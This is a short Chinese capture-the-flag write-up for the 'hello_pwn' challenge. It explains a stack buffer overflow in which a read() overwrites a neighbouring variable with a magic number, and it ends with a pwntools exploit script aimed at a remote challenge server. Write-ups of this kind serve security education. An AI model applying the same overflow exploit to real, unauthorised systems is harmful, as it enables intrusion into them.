hello_pwn--writeup

文件下载地址:

链接:https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ
提取码:g47i 
 

0x01.分析

checksec:

hello_pwn--writeup_第1张图片

64位程序,开启NX。

源码:

hello_pwn--writeup_第2张图片

hello_pwn--writeup_第3张图片

流程很简单,只要保证106c这个变量的值等于后面这个数字就可以了,前面有read函数,明显的栈溢出,只要想办法修改下面这个变量的值就行了。

发现这两个变量的差值为4,所以只需要溢出的时候填充四个字节的无效信息,再填充后面那个数字,就可去执行sub函数,拿到flag。

0x02.exp

##!/usr/bin/env python 
from pwn import*

r=remote("111.198.29.45",44362)
#r=process('./hellopwn')

payload=4*'A'+p64(1853186401)

r.recvuntil("bof")
r.sendline(payload)

r.interactive()

 

你可能感兴趣的:(CTF-PWN,#,攻防世界-pwn,--,WriteUp)